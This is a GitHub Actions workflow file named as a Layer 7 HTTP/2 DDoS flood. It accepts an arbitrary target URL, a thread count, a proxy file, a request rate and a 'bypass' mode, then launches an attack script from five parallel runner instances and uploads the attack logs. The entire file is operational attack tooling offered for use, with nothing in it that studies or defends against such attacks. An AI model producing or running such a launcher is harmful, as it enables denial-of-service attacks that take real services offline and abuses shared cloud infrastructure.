name: Layer 7 DDoS Attack - HTTP/2 Flood

on:
  workflow_dispatch:
    inputs:
      target:
        description: 'Target URL'
        required: true
        default: 'https://example.com'
      time:
        description: 'Attack duration in seconds'
        required: true
        default: '60'
      thread:
        description: 'Number of threads'
        required: true
        default: '500'
      proxyfile:
        description: 'Proxy file name'
        required: true
        default: 'proxy.txt'
      rps:
        description: 'Requests per second'
        required: true
        default: '32'
      mode:
        description: 'Attack mode (bypass/flood)'
        required: true
        default: 'bypass'
        type: choice
        options:
        - bypass
        - flood

jobs:
  attack:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        instance: [1, 2, 3, 4, 5]
        
    steps:
    - name: Checkout code
      uses: actions/checkout@v4
      
    - name: Set up Node.js
      uses: actions/setup-node@v4
      with:
        node-version: '16'
        
    - name: Install dependencies
      run: |
        npm install colors request
        
    - name: Run attack
      env:
        TARGET: ${{ github.event.inputs.target }}
        TIME: ${{ github.event.inputs.time }}
        THREAD: ${{ github.event.inputs.thread }}
        PROXY_FILE: ${{ github.event.inputs.proxyfile }}
        RPS: ${{ github.event.inputs.rps }}
        MODE: ${{ github.event.inputs.mode }}
      run: node script.js $TARGET $TIME $THREAD $PROXY_FILE $RPS $MODE
      
    - name: Upload logs
      uses: actions/upload-artifact@v4
      with:
        name: attack-logs-${{ matrix.instance }}
        path: attack_logs.txt
